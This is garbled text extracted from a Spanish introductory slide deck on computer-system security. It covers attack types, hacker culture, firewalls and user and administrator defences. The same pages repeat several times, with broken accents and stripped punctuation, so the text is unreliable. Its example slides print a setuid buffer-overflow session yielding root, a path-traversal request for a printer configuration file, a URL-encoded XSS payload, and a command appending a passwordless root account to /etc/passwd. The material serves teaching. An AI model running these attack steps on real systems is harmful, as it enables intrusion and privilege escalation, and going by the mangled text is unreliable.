bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 13: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 14: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 15: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 16: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

